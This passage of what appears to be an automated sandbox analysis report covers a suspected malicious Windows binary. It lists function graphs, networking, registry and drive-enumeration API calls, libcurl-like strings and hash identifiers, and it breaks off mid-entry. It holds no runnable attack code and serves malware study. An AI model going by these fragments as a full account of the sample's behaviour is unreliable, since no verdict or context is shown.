                                                                • String ID: cf-socket.c$connect to %s port %u from %s port %d failed: %s$connected$local address %s port %d...$not connected yet
                                                                • API String ID: 1669343778-879669977
                                                                • Opcode ID: c99b50ba43529cf1203ff6b68cfd2b76368e3d019f6793d5f8adab50f19c9ed7
                                                                • Instruction ID: 60f233bbefce15487ec20a9bcd5ac323715aa20b9582bc1dca2d3e352feb6494
                                                                • Opcode Fuzzy Hash: c99b50ba43529cf1203ff6b68cfd2b76368e3d019f6793d5f8adab50f19c9ed7
                                                                • Instruction Fuzzy Hash: 6DB19D70604305ABEB10CF24C985BA777E4AF45319F04852EEC59AA393DF78E85CCB56

                                                                Control-flow Graph

                                                                • Function start: 422f17; blocks calling imported APIs: 422f91-422ff4 (RegOpenKeyExA), 42315c-4231ac (RegEnumKeyExA), 423010-423083 (RegOpenKeyExA), 423089-4230d4 (RegQueryValueExA), 42313b-42314b (RegCloseKey); graph image not reproduced
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1424245644.0000000000421000.00000040.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_420000_2M43DSi2cx.jbxd
                                                                Similarity
                                                                • API ID: EnumOpen
                                                                • String ID: d
                                                                • API String ID: 3231578192-2564639436
                                                                • Opcode ID: 57e0f455b5423d79f54ef88da549d843b53a82df77f1a2b990fc8517bd1915d5
                                                                • Instruction ID: 286cd68e4ccfe73279d446658d9a41e9ff1ff53f75d1a86de6b320ffc5f173ed
                                                                • Opcode Fuzzy Hash: 57e0f455b5423d79f54ef88da549d843b53a82df77f1a2b990fc8517bd1915d5
                                                                • Instruction Fuzzy Hash: 9971B4B49043199FDB50DF69D98479EBBF0FF85308F00885DE89897341E7789A898F92

                                                                Control-flow Graph

                                                                • Function start: 4276a0; block calling imported API: 4276e6-4276f2 (send); graph image not reproduced
                                                                APIs
                                                                • send.WS2_32(multi.c,?,?,?,N=B,00000000,?,?,004307BF), ref: 004276EB
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1424245644.0000000000421000.00000040.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_420000_2M43DSi2cx.jbxd
                                                                Similarity
                                                                • API ID: send
                                                                • String ID: LIMIT %s:%d %s reached memlimit$N=B$SEND %s:%d send(%lu) = %ld$multi.c$send
                                                                • API String ID: 2809346765-2025329211
                                                                • Opcode ID: 5460e84d55d8f64c3ae6344df08f9ebc5ea5a703945c332d73c26f38d77b9b33
                                                                • Instruction ID: e8e2f5a69888ec701a6da2f6bab30a68516d673675c13a43a07bdc5782ece158
                                                                • Opcode Fuzzy Hash: 5460e84d55d8f64c3ae6344df08f9ebc5ea5a703945c332d73c26f38d77b9b33
                                                                • Instruction Fuzzy Hash: 0E110DB17093247BD1209715FC4AE2B7B5CDBC1B68F840A59FC0853382D5659C01C6F6

                                                                Control-flow Graph

                                                                • Function start: 459290; blocks calling imported APIs: 459335-459364 (WSAIoctl), 459371-459390 (setsockopt); graph image not reproduced
                                                                APIs
                                                                • WSAIoctl.WS2_32(?,4004747B,00000000,00000000,?,00000004,?,00000000,00000000), ref: 0045935D
                                                                • setsockopt.WS2_32(?,0000FFFF,00001001,00000000,00000004,?,00000004,?,00000000,00000000), ref: 00459389
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1424245644.0000000000421000.00000040.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_420000_2M43DSi2cx.jbxd
                                                                Similarity
                                                                • API ID: Ioctlsetsockopt
                                                                • String ID: Send failure: %s$cf-socket.c$send(len=%zu) -> %d, err=%d
                                                                • API String ID: 1903391676-2691795271
                                                                • Opcode ID: abf04156f8e72c1c3a3dbb90b5ce6a463a3241f1077d2f5d4cbb536c1a903adf
                                                                • Instruction ID: 7cd932bbdc027ff0561ca329cb73e9554b5c097b6ad3459c3c7ae3f21eb9b77e
                                                                • Opcode Fuzzy Hash: abf04156f8e72c1c3a3dbb90b5ce6a463a3241f1077d2f5d4cbb536c1a903adf
                                                                • Instruction Fuzzy Hash: 0A51AE70A04305EBDB14DF24C881BAAB7A5FF89314F14852AFD489B382E734ED95C795

                                                                Control-flow Graph

                                                                • Function start: 427770; block calling imported API: 4277b6-4277c2 (recv); graph image not reproduced
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1424245644.0000000000421000.00000040.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_420000_2M43DSi2cx.jbxd
                                                                Similarity
                                                                • API ID: recv
                                                                • String ID: LIMIT %s:%d %s reached memlimit$RECV %s:%d recv(%lu) = %ld$recv
                                                                • API String ID: 1507349165-640788491
                                                                • Opcode ID: 4f1e1005fabeda0abe8a51eb6a65da3bbb84e02fd899d894c129c803d26b95b6
                                                                • Instruction ID: 25c2bdd62f90d6336636e33e8617a7b7fa5c3f32ac894db932a11182ed333ff0
                                                                • Opcode Fuzzy Hash: 4f1e1005fabeda0abe8a51eb6a65da3bbb84e02fd899d894c129c803d26b95b6
                                                                • Instruction Fuzzy Hash: 51113DB5B053547BD120EB15FC4AE277B5CDBC6B68F840A59BC4453382D565AC01C5F2

                                                                Control-flow Graph

                                                                • Function start: 4275e0; block calling imported API: 427607-427629 (socket); graph image not reproduced
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1424245644.0000000000421000.00000040.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_420000_2M43DSi2cx.jbxd
                                                                Similarity
                                                                • API ID: socket
                                                                • String ID: FD %s:%d socket() = %d$LIMIT %s:%d %s reached memlimit$socket
                                                                • API String ID: 98920635-842387772
                                                                • Opcode ID: 365ff01e4d148cc80fbacc937effbe1004cb83f79c1c82753325ca139ac42a6c
                                                                • Instruction ID: 4755164757cdde70cb291c6623968af6ee9e5431a0e0fba34521dbb278498e03
                                                                • Opcode Fuzzy Hash: 365ff01e4d148cc80fbacc937effbe1004cb83f79c1c82753325ca139ac42a6c
                                                                • Instruction Fuzzy Hash: 0B114872B4532177DA206B2DBC66F9B3B88EF81734F880A55F854932E2D6258C51C6E1

                                                                 Control-flow Graph (rendered graph exported as a node/edge list; legend: Executed / Not Executed)
                                                                 control_flow_graph 1783 7a8e90-7a8eb8 _open 1784 7a8eba-7a8ec7 1783->1784 1785 7a8eff-7a8f2c call 7a9f70 1783->1785 1786 7a8ec9 1784->1786 1787 7a8ef3-7a8efa call 7a8d20 1784->1787 1793 7a8f39-7a8f51 call 7a8ca8 1785->1793 1789 7a8ecb-7a8ecd 1786->1789 1790 7a8ee2-7a8ef1 1786->1790 1787->1785 1794 7a8ed3-7a8ed6 1789->1794 1795 8a63f0-8a6407 1789->1795 1790->1786 1790->1787 1801 7a8f53-7a8f5e call 7a8cc0 1793->1801 1802 7a8f30-7a8f37 1793->1802 1794->1790 1799 7a8ed8 1794->1799 1797 8a640a-8a6431 1795->1797 1798 8a6409 1795->1798 1803 8a6439-8a643f 1797->1803 1799->1790 1801->1784 1802->1793 1802->1801 1805 8a6459-8a647b 1803->1805 1806 8a6441-8a644f 1803->1806 1810 8a647d-8a6484 1805->1810 1811 8a6486-8a649b 1805->1811 1808 8a6455-8a6458 1806->1808 1810->1811 1812 8a649d-8a64b2 1810->1812 1811->1806 1812->1808
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1424245644.0000000000421000.00000040.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                                 • Associated: 00000000.00000002.1424227343.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1424245644.00000000009FD000.00000040.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1424245644.0000000000B61000.00000040.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1424245644.0000000000B63000.00000040.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1424718261.0000000000B66000.00000004.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1424735414.0000000000B68000.00000040.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1424735414.0000000000CFD000.00000040.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1424735414.0000000000E03000.00000040.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1424735414.0000000000E0C000.00000040.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1424735414.0000000000EE0000.00000040.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1424735414.0000000000EE9000.00000040.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1424735414.0000000000EF7000.00000040.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1425042232.0000000000EF8000.00000080.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1425165243.00000000010B4000.00000040.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1425184734.00000000010B6000.00000080.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_420000_2M43DSi2cx.jbxd
                                                                Similarity
                                                                • API ID: _open
                                                                • String ID: terminated$@
                                                                • API String ID: 4183159743-3016906910
                                                                • Opcode ID: af7db5b14a6ea80907416f8a40f07275c14b60149f9059731200f97545091ad7
                                                                • Instruction ID: 8ab1e6d07578c7aff61d082b90efcf59bfcc170f0fe9632c89007e05a0aba578
                                                                • Opcode Fuzzy Hash: af7db5b14a6ea80907416f8a40f07275c14b60149f9059731200f97545091ad7
                                                                • Instruction Fuzzy Hash: 01416CB0909305CEDB40EF78C44466EBBE4FB8A314F048A2DE868D7350EB78D945CB56

                                                                 Control-flow Graph (rendered graph exported as a node/edge list; legend: Executed / Not Executed)
                                                                 control_flow_graph 1815 45a150-45a159 1816 45a250 1815->1816 1817 45a15f-45a17b 1815->1817 1818 45a181-45a1ce getsockname 1817->1818 1819 45a249-45a24f 1817->1819 1820 45a1f7-45a214 call 45ef30 1818->1820 1821 45a1d0-45a1f5 call 43d090 1818->1821 1819->1816 1820->1819 1825 45a216-45a23b call 43d090 1820->1825 1828 45a240-45a246 call 464f40 1821->1828 1825->1828 1828->1819
                                                                APIs
                                                                • getsockname.WS2_32(?,?,00000080), ref: 0045A1C7
                                                                Strings
                                                                • ssloc inet_ntop() failed with errno %d: %s, xrefs: 0045A23B
                                                                • getsockname() failed with errno %d: %s, xrefs: 0045A1F0
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1424245644.0000000000421000.00000040.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                                 • Associated: 00000000.00000002.1424227343.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1424245644.00000000009FD000.00000040.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1424245644.0000000000B61000.00000040.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1424245644.0000000000B63000.00000040.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1424718261.0000000000B66000.00000004.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1424735414.0000000000B68000.00000040.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1424735414.0000000000CFD000.00000040.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1424735414.0000000000E03000.00000040.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1424735414.0000000000E0C000.00000040.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1424735414.0000000000EE0000.00000040.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1424735414.0000000000EE9000.00000040.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1424735414.0000000000EF7000.00000040.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1425042232.0000000000EF8000.00000080.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1425165243.00000000010B4000.00000040.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1425184734.00000000010B6000.00000080.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_420000_2M43DSi2cx.jbxd
                                                                Similarity
                                                                • API ID: getsockname
                                                                • String ID: getsockname() failed with errno %d: %s$ssloc inet_ntop() failed with errno %d: %s
                                                                • API String ID: 3358416759-2605427207
                                                                • Opcode ID: 5b4e109eb1a2066137602f43a46f6058411204a33b2fdec0359ce41189c1eeb8
                                                                • Instruction ID: ce153f2232b1329c50f5e7de66082985507efc78e2a75ca131ce45bb8fbe87be
                                                                • Opcode Fuzzy Hash: 5b4e109eb1a2066137602f43a46f6058411204a33b2fdec0359ce41189c1eeb8
                                                                • Instruction Fuzzy Hash: D2214B31808280B6E7259B19EC03FE773BCEF81328F000655FD8853152FA32599987E7

                                                                 Control-flow Graph (rendered graph exported as a node/edge list; legend: Executed / Not Executed)
                                                                 control_flow_graph 1835 43d5e0-43d5ee 1836 43d652-43d662 WSAStartup 1835->1836 1837 43d5f0-43d604 call 43d690 1835->1837 1838 43d670-43d676 1836->1838 1839 43d664-43d66f 1836->1839 1843 43d606-43d614 1837->1843 1844 43d61b-43d651 call 447620 1837->1844 1838->1837 1841 43d67c-43d68d 1838->1841 1843->1844 1849 43d616 1843->1849 1849->1844
                                                                APIs
                                                                • WSAStartup.WS2_32(00000202), ref: 0043D65A
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1424245644.0000000000421000.00000040.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                                 • Associated: 00000000.00000002.1424227343.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1424245644.00000000009FD000.00000040.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1424245644.0000000000B61000.00000040.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1424245644.0000000000B63000.00000040.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1424718261.0000000000B66000.00000004.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1424735414.0000000000B68000.00000040.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1424735414.0000000000CFD000.00000040.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1424735414.0000000000E03000.00000040.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1424735414.0000000000E0C000.00000040.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1424735414.0000000000EE0000.00000040.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1424735414.0000000000EE9000.00000040.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1424735414.0000000000EF7000.00000040.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1425042232.0000000000EF8000.00000080.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1425165243.00000000010B4000.00000040.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1425184734.00000000010B6000.00000080.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_420000_2M43DSi2cx.jbxd
                                                                Similarity
                                                                • API ID: Startup
                                                                • String ID: if_nametoindex$iphlpapi.dll
                                                                • API String ID: 724789610-3097795196
                                                                • Opcode ID: 4850ababd08cd4bd4393361fec57057816fc5af42d7b734a4e5889154f0c8907
                                                                • Instruction ID: f58c97a763604250da33d82fe6226de8f9a060d4a66e8a73d5c58f3e6014a718
                                                                • Opcode Fuzzy Hash: 4850ababd08cd4bd4393361fec57057816fc5af42d7b734a4e5889154f0c8907
                                                                • Instruction Fuzzy Hash: F9019E90D4034052F761B738BC2B32735946B59304F493DADD868932D2FB7CC55AC253

                                                                 Control-flow Graph (rendered graph exported as a node/edge list; legend: Executed / Not Executed)
                                                                 control_flow_graph 1851 4eaa30-4eaa64 1853 4eaa6a-4eaaa7 call 4de730 1851->1853 1854 4eab04-4eab09 1851->1854 1858 4eab0e-4eab13 1853->1858 1859 4eaaa9-4eaabd 1853->1859 1855 4eae80-4eae89 1854->1855 1862 4eae2e 1858->1862 1860 4eaabf-4eaac7 1859->1860 1861 4eab18-4eab50 1859->1861 1860->1862 1863 4eaacd-4eab02 1860->1863 1868 4eab58-4eab6d 1861->1868 1864 4eae30-4eae4a call 4dea60 call 4debf0 1862->1864 1863->1868 1878 4eae4c-4eae57 1864->1878 1879 4eae75-4eae7d 1864->1879 1870 4eab6f-4eab73 1868->1870 1871 4eab96-4eabab socket 1868->1871 1870->1871 1874 4eab75-4eab8f 1870->1874 1871->1862 1873 4eabb1-4eabc5 1871->1873 1876 4eabc7-4eabca 1873->1876 1877 4eabd0-4eabed ioctlsocket 1873->1877 1874->1873 1892 4eab91 1874->1892 1876->1877 1882 4ead2e-4ead39 1876->1882 1883 4eabef-4eac0a 1877->1883 1884 4eac10-4eac14 1877->1884 1880 4eae6e-4eae6f 1878->1880 1881 4eae59-4eae5e 1878->1881 1879->1855 1880->1879 1881->1880 1886 4eae60-4eae6c 1881->1886 1890 4ead3b-4ead4c 1882->1890 1891 4ead52-4ead56 1882->1891 1883->1884 1894 4eae29 1883->1894 1887 4eac16-4eac31 1884->1887 1888 4eac37-4eac41 1884->1888 1886->1879 1887->1888 1887->1894 1896 4eac7a-4eac7e 1888->1896 1897 4eac43-4eac46 1888->1897 1890->1891 1890->1894 1893 4ead5c-4ead6b 1891->1893 1891->1894 1892->1862 1902 4ead70-4ead78 1893->1902 1894->1862 1899 4eace7-4eacfe 1896->1899 1900 4eac80-4eac9b 1896->1900 1904 4eac4c-4eac51 1897->1904 1905 4ead04-4ead08 1897->1905 1899->1905 1900->1899 1906 4eac9d-4eacc1 1900->1906 1907 4ead7a-4ead7f 1902->1907 1908 4eada0-4eadae connect 1902->1908 1904->1905 1910 4eac57-4eac78 1904->1910 1905->1882 1909 4ead0a-4ead28 1905->1909 1911 4eacc6-4eacd7 1906->1911 1907->1908 1912 4ead81-4ead99 1907->1912 1913 4eadb3-4eadcf 1908->1913 1909->1882 1909->1894 1910->1911 1911->1894 1919 4eacdd-4eace5 1911->1919 1912->1913 1920 4eae8a-4eae91 1913->1920 1921 4eadd5-4eadd8 1913->1921 1919->1899 1919->1905 1920->1864 1922 4eadda-4eaddf 1921->1922 1923 4eade1-4eadf1 1921->1923 1922->1902 1922->1923 1924 4eae0d-4eae12 1923->1924 1925 4eadf3-4eae07 1923->1925 1926 4eae1a-4eae1c call 4eaf70 1924->1926 1927 4eae14-4eae17 1924->1927 1925->1924 1930 4eaea8-4eaead 1925->1930 1931 4eae21-4eae23 1926->1931 1927->1926 1930->1864 1932 4eae25-4eae27 1931->1932 1933 4eae93-4eae9d 1931->1933 1932->1864 1934 4eaeaf-4eaeb1 call 4de760 1933->1934 1935 4eae9f-4eaea6 call 4de7c0 1933->1935 1938 4eaeb6-4eaebe 1934->1938 1935->1938 1940 4eaf1a-4eaf1f 1938->1940 1941 4eaec0-4eaedb call 4de180 1938->1941 1940->1864 1941->1864 1944 4eaee1-4eaeec 1941->1944 1945 4eaeee-4eaeff 1944->1945 1946 4eaf02-4eaf06 1944->1946 1945->1946 1947 4eaf0e-4eaf15 1946->1947 1948 4eaf08-4eaf0b 1946->1948 1947->1855 1948->1947
                                                                APIs
                                                                • socket.WS2_32(FFFFFFFF,?,00000000), ref: 004EAB9B
                                                                • ioctlsocket.WS2_32(00000000,8004667E,00000001), ref: 004EABE4
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1424245644.0000000000421000.00000040.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                                 • Associated: 00000000.00000002.1424227343.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1424245644.00000000009FD000.00000040.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1424245644.0000000000B61000.00000040.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1424245644.0000000000B63000.00000040.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1424718261.0000000000B66000.00000004.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1424735414.0000000000B68000.00000040.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1424735414.0000000000CFD000.00000040.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1424735414.0000000000E03000.00000040.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1424735414.0000000000E0C000.00000040.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1424735414.0000000000EE0000.00000040.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1424735414.0000000000EE9000.00000040.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1424735414.0000000000EF7000.00000040.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1425042232.0000000000EF8000.00000080.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1425165243.00000000010B4000.00000040.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1425184734.00000000010B6000.00000080.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_420000_2M43DSi2cx.jbxd
                                                                Similarity
                                                                • API ID: ioctlsocketsocket
                                                                • String ID:
                                                                • API String ID: 416004797-0
                                                                • Opcode ID: 31e677926115f9653b0ae8ae6685f68c8222cb8571f0918337a2001fb3ef960e
                                                                • Instruction ID: a947b21fa9f9a82b9df9dd9803b04d04b3537410b7eda2f0b1edc7c9f2e30cf1
                                                                • Opcode Fuzzy Hash: 31e677926115f9653b0ae8ae6685f68c8222cb8571f0918337a2001fb3ef960e
                                                                • Instruction Fuzzy Hash: 7DE1E0706003819BEB20CF1AC885B6B77A5FF85305F144A2EF9988B391D779E854CB97
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1427077143.0000000006EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06EB0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_6eb0000_2M43DSi2cx.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: A:\
                                                                • API String ID: 0-3379428675
                                                                • Opcode ID: a5f6dfab50543ca4481a0fabbed4440ba789e6c0f60b975aeb3f6307da52e6c1
                                                                • Instruction ID: 365f3893ce69562cb902067e079860fb0681ac858c65588b4767318d93ba3027
                                                                • Opcode Fuzzy Hash: a5f6dfab50543ca4481a0fabbed4440ba789e6c0f60b975aeb3f6307da52e6c1
                                                                • Instruction Fuzzy Hash: 2F8104EB14C321BD738285912B58EFB6B6DE5C6730330B83BF803D6542E2945E4E51B1
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1427077143.0000000006EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06EB0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_6eb0000_2M43DSi2cx.jbxd
                                                                Similarity
                                                                • API ID: DrivesLogical
                                                                • String ID: A:\
                                                                • API String ID: 999431828-3379428675
                                                                • Opcode ID: 63f28cc331d233e985650d29437578c248391d27b9a1c534ed92c2856e55e1be
                                                                • Instruction ID: 6bb73f6d849bc6d7de2fd56cccacc2eb9d93372287b46d18c7c83bf35841d1ae
                                                                • Opcode Fuzzy Hash: 63f28cc331d233e985650d29437578c248391d27b9a1c534ed92c2856e55e1be
                                                                • Instruction Fuzzy Hash: 91718EEB14C321BD738285912B68EFB6B6DE5D6770331B83AF803D6502E2985E4E51B1
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1427077143.0000000006EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06EB0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_6eb0000_2M43DSi2cx.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: A:\
                                                                • API String ID: 0-3379428675
                                                                • Opcode ID: cca705f4403319b7a553262543b8b4c43157231371654f020bf3dd92293a4ce0
                                                                • Instruction ID: c2e04e9948c48956a10d7e2471f3d15f9e1faa963f583d137002b1eb38229eb3
                                                                • Opcode Fuzzy Hash: cca705f4403319b7a553262543b8b4c43157231371654f020bf3dd92293a4ce0
                                                                • Instruction Fuzzy Hash: 35518FFB14C321BD738285912B58EFB6B6DE5D6770331B82BF803D6502E2946E4E51B1
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1427077143.0000000006EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06EB0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_6eb0000_2M43DSi2cx.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: A:\
                                                                • API String ID: 0-3379428675
                                                                • Opcode ID: a84138ada43d413c970acc1cb5634741034be7f608f209fd6ed67fb9981c239b
                                                                • Instruction ID: 6a5a9a032f779daa39365ee9ce6897bf92262ae2ac47ae9a178a9a2c69fa1ced
                                                                • Opcode Fuzzy Hash: a84138ada43d413c970acc1cb5634741034be7f608f209fd6ed67fb9981c239b
                                                                • Instruction Fuzzy Hash: 7151E4FB54C311BE73C285912B58AFB6B6DE5DA730330B82AF807D6502E2946E4E51B1
                                                                APIs
                                                                • GetLogicalDrives.KERNELBASE ref: 06EB03AB
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1427077143.0000000006EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06EB0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_6eb0000_2M43DSi2cx.jbxd
                                                                Similarity
                                                                • API ID: DrivesLogical
                                                                • String ID: A:\
                                                                • API String ID: 999431828-3379428675
                                                                • Opcode ID: 4011929e6e9044ab5f0fd25217c9c485708e22722ba13f0d5901d3b080d277c3
                                                                • Instruction ID: 113c5961f6e9c42667474dabfed6b7af1dd72283fe2f2468ce2a0d371792d380
                                                                • Opcode Fuzzy Hash: 4011929e6e9044ab5f0fd25217c9c485708e22722ba13f0d5901d3b080d277c3
                                                                • Instruction Fuzzy Hash: 2551D0FB54C311BE73C286912B58AFB6B6DE5D6730330B86AF803D6502E2946F4E51B1
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1427077143.0000000006EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06EB0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_6eb0000_2M43DSi2cx.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: A:\
                                                                • API String ID: 0-3379428675
                                                                • Opcode ID: bc3ff7533e863fe5a1eb0d90daecad98123a10ecfa7ea8c49e0bfa2ca8ed05dc
                                                                • Instruction ID: a5c1c51358cebbba4d3dbcbfa9de9ca4cff0634eb86e8cf552b29b41717e1cbf
                                                                • Opcode Fuzzy Hash: bc3ff7533e863fe5a1eb0d90daecad98123a10ecfa7ea8c49e0bfa2ca8ed05dc
                                                                • Instruction Fuzzy Hash: 0A51D0EB50C311BEB38285912B58AFB6B6DE5D6730330B43AF803D6602E2946F4E51B1
                                                                APIs
                                                                • GetLogicalDrives.KERNELBASE ref: 06EB03AB
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1427077143.0000000006EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06EB0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_6eb0000_2M43DSi2cx.jbxd
                                                                Similarity
                                                                • API ID: DrivesLogical
                                                                • String ID: A:\
                                                                • API String ID: 999431828-3379428675
                                                                • Opcode ID: 851b646aa1aaa6a47d148f6dc8b975694e7c7dbb41022d7e8cf8fdb3bd03faa5
                                                                • Instruction ID: 28d7a9063e823e9a2d3d423183cc8c94a735767bc54e2764fb9724ff1f4c5d66
                                                                • Opcode Fuzzy Hash: 851b646aa1aaa6a47d148f6dc8b975694e7c7dbb41022d7e8cf8fdb3bd03faa5
                                                                • Instruction Fuzzy Hash: C14115EB54C311BE73C285912B58AFB6B6DE5D7730330B83AF403E6602E2946E0E51B1
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1427077143.0000000006EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06EB0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_6eb0000_2M43DSi2cx.jbxd
                                                                Similarity
                                                                • API ID: DrivesLogical
                                                                • String ID: A:\
                                                                • API String ID: 999431828-3379428675
                                                                • Opcode ID: 08f69c4ab36606241544e43d54ed5f17a0d68d5fb596e87e57e8d94466f71305
